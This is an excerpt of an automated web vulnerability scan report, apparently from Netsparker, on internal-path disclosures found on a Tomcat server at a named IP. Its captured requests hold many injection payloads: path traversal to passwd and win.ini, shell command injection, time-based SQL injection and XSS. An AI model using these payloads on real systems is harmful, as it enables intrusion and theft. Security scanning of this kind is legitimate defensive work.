GET /docs/html-manager-howto.html HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…on the Javadocs page for the <code>java.net.JarURLConnection</code> class. Use only URLs that refer to the entire WAR file.</p><p>In this example the web application located in the directory <code>C:\path\to\foo</code> on the Tomcat server (running on Windows) is deployed as the web application context named <code>/footoo</code>.</p><div align="left"><table border="0" cellpadding="0" cellspacing="4"><tr><td…gcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>Context Path: /footoo
WAR or Directory URL: file:C:/path/to/foo</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td></tr><tr><td height="1" width="1" bgcolor="#023264"><img bord…d width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre><Context path="/foobar" docBase="C:\path\to\application\foobar"> <!-- Link to the user database we will get roles from --> <ResourceLink name="users" global="UserDatabase" type="org.apache.catalina.UserDatabase"/></Contex…><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>XML Configuration file URL: file:C:/path/to/context.xml</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td></tr><tr><td height="1" width="1" bgcolor="#023264"><img bord…
17.2. /examples/servlets/servlet/SessionExample
http://161.74.91.78:8080/examples/servlets/servlet/SessionExample?dataname=response.write(268409241-..
Identified Internal Path(s)
c:\windows\win.ini
Certainty
Request
GET /examples/servlets/servlet/SessionExample?dataname=response.write(268409241-22)%27&datavalue=bar HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/examples/servlets/servlet/SessionExample
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000980%29%3C%2Fscript%3E=3; hTTp://netsparker.com/n=3; NSFTW=3; //netsparker.com/n/n.css?0x00098A=3; http://netsparker.com/n?.php=3; ns:netsparker056650=vuln=3; /../../../../../../../../../../../etc/passwd=3; #{28274*28274-(13)}=3; netsparker.com/n=3; /etc/passwd=3; '+NSFTW+'=3; javascript:netsparker(0x00098D)=3; CookieExample=3; /examples/servlets/servlet/CookieExample=3; <script>ns(0x0009A8)</script>=3; /servlets/servlet/CookieExample=3; /servlet/CookieExample=3; $Version=1; Smith="netsparker.com/n"; JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784
Accept-Encoding: gzip, deflate

Response
…FF9999-2 & = bar<br>1 ns=netsparker(0x000993) = bar<br>'" ns= netsparker(0x000992) = bar<br>'+netsparker(0x00099D)+' = bar<br>netsparker(0x0009A0) = bar<br>theTruth = true<br>c:\windows\win.ini = bar<br>php://filter//resource=http://netsparker.com/n?.php = bar<br>ping -c 26 127.0.0.1 = bar<br>http://netsparker.com/n?.php = bar<br>1 + (select dbms_pipe.receive_message((chr(95)||chr…
17.3. /docs/windows-service-howto.html
http://161.74.91.78:8080/docs/windows-service-howto.html
Identified Internal Path(s)
C:\Program Files\Tomcat\bin\tomcat6.exe
Certainty
Request
GET /docs/windows-service-howto.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/setup.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…h="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>Install the service named 'Tomcat6'
C:\> tomcat6 //IS//Tomcat6 --DisplayName="Apache Tomcat 6" \
C:\>     --Install="C:\Program Files\Tomcat\bin\tomcat6.exe" --Jvm=auto \
C:\>     --StartMode=jvm --StopMode=jvm \
C:\>     --StartClass=org.apache.catalina.startup.Bootstrap --StartParams=start \
C:\>     --StopClass=org.apache.catalina.startup.Bootstrap --Sto…
17.4. /docs/building.html
http://161.74.91.78:8080/docs/building.html
Identified Internal Path(s)
C:\usr\share\java
Certainty
Request
GET /docs/building.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…system, an ordinary user will not have access to write to this directory, and, even if you do, it may not be appropriate for you to write there. On Windows this usually corresponds to the <code>C:\usr\share\java</code> directory, unless Cygwin is used. Read below to learn how to customize the directory used to download the binaries.</p><p><b>NOTE:</b> Users accessing the Internet through a proxy must…
17.5. /docs/config/host.html
http://161.74.91.78:8080/docs/config/host.html
Identified Internal Path(s)
c:\Homes
Certainty
Request
GET /docs/config/host.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/realm-howto.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…d></tr></table></div> <p>On a server where <code>/etc/passwd</code> is not in use, you can request Catalina to consider all directories found in a specified base directory (such as <code>c:\Homes</code> in this example) to be considered "user home" directories for the purposes of this directive:</p><div align="left"><table border="0" cellpadding="0" cellspacing="4"><tr><td height="1" wi…ight="1" bgcolor="#ffffff"><pre><Host name="localhost" ...> ... <Listener className="org.apache.catalina.startup.UserConfig" directoryName="public_html" homeBase="c:\Homes" userClass="org.apache.catalina.startup.HomesUserDatabase"/> ...</Host></pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1"a…
17.6. /examples/servlets/servlet/CookieExample
http://161.74.91.78:8080/examples/servlets/servlet/CookieExample
Identified Internal Path(s)
c:\windows\win.ini=3
Certainty
Request
POST /examples/servlets/servlet/CookieExample HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/examples/servlets/servlet/CookieExample
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: '=3; NS1NO=3; Smith="&ping -c 26 127.0.0.1 &"; %27=3; '"--></style></script><script>netsparker(0x000964)</script>=3; ../../../../../../../../../../boot.ini=3; ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini=3; /../../../../../../../../../../boot.ini=3; file:/windows/win.ini=3; ../../../../../../../../../../windows/win.ini=3; $Version=1; Smith="1));SELECT pg_sleep(25)--"; JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784; COOKIE_SUPPORT=true
Accept-Encoding: gzip, deflate
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

cookiename=c%3a%5cwindows%5cwin.ini&cookievalue=3

Response
HTTP/1.1 200 OK
Date: Fri, 25 Jan 2013 09:13:44 GMT
Server: Apache-Coyote/1.1
Set-Cookie: c:\windows\win.ini=3
Content-Length: 1643
Content-Type: text/html

<html><body bgcolor="white"><head><title>Cookies Example</title></head><body><a href="../cookies.html"><img src="../images/code.gif" height=24 width=24 align=right border=0 alt="view code"></a><a href="../index.html"><img src="../images/return.gif" height=24 width=24 align=right border=0 alt="return"></a><h3>Cookies Example</h3>Your browser is sending the following cookies:<br>Cookie Name: '<br> Cookie Value: 3<br><br>Cookie Name: NS1NO<br> Cookie Value: 3<br><br>Cookie Name: Smith<br> Cookie Value: &ping -c 26 127.0.0.1 &<br><br>Cookie Name: %27<br> Cookie Value: 3<br><br>Cookie Name: '<br> Cookie Value: <br><br>Cookie Name: ../../../../../../../../../../boot.ini<br> Cookie Value: 3<br><br>Cookie Name: ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini<br> Cookie Value: 3<br><br>Cookie Name: /../../../../../../../../../../boot.ini<br> Cookie Value: 3<br><br>Cookie Name: file<br> Cookie Value: <br><br>Cookie Name: ../../../../../../../../../../windows/win.ini<br> Cookie Value: 3<br><br>Cookie Name: Smith<br> Cookie Value: 1));SELECT pg_sleep(25)--<br><br>Cookie Name: JSESSIONID<br> Cookie Value: 8CFCC592DC40DA02412C5EFC1A18A784<br><br>Cookie Name: COOKIE_SUPPORT<br> Cookie Value: true<br><br><P>You just sent the following cookie to your browser:<br>Name: c:\windows\win.ini<br>Value: 3<P>Create a cookie to send to your browser<br><form action="CookieExample" method=POST>Name: <input type=text length=20 name=cookiename><br>Value: <input type=text length=20 name=cookievalue><br><input type=submit></form></body></html>
17.7. /examples/jsp/sessions/carts.jsp
http://161.74.91.78:8080/examples/jsp/sessions/carts.jsp?item=Beavis+%26+Butt-head+Video+collection%..
Identified Internal Path(s)
c:\windows\win.ini
Certainty
Request
GET /examples/jsp/sessions/carts.jsp?item=Beavis+%26+Butt-head+Video+collection%0a&submit=%22%26expr%20268409241%20-%202%20%26%22 HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/examples/jsp/sessions/carts.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Accept-Encoding: gzip, deflate

Response
…(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- <li> ns:netsparker056650=vuln <li> response.write(268409241-22)' <li>../../../../../../../../../../windows/win.ini.jsp <li> c:\windows\win.ini </ol></FONT><hr><html><!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for addition…